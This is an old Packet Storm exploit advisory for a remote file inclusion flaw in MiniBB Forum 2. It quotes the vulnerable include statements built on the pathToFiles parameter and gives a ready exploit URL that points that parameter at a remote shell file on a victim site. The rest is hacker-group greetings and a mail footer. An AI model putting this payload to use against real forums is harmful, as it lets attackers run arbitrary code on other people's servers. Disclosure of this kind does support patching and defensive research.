minibb2-rfi.txt

2006-11-14T00:00:00
ID PACKETSTORM:52042
Type packetstorm
Reporter ThE-LoRd-Of-CrAcKiNg
Modified 2006-11-14T00:00:00

Description

                                        
                                            `Title : MiniBB Forum <= 2 Remote File Include (index.php)  
########################################################################  
#######  
  
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}  
  
------------------------------------------------------------------------  
Sorce Code:  
http://www.minibb.net/download.php?file=minibb20  
-----  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : MiniBB Forum 2 (index.php)version :  
version [ 2 ]  
exploit :Remote File Include  
------------------------------------------------------------------------  
-----  
Vulnerable Code:  
include ($pathToFiles.'setup_'.$DB.'.php');  
include ($pathToFiles.'bb_cookie.php');  
include ($pathToFiles.'bb_functions.php');  
include ($pathToFiles.'bb_specials.php');  
----------------------------------------------------------------------  
Exploit:  
http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?  
  
  
  
------------------------------------------------------------------------  
----  
  
greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco  
  
Special Greeting:AsbMay's Group  
  
channel:www.asb-may.net  
  
contact:spoonman500[at]hotmail[dot]com  
  
_________________________________________________________________  
MSN Hotmail sur i-mode™ : envoyez et recevez des e-mails depuis votre   
téléphone portable ! http://www.msn.fr/hotmailimode/  
  
`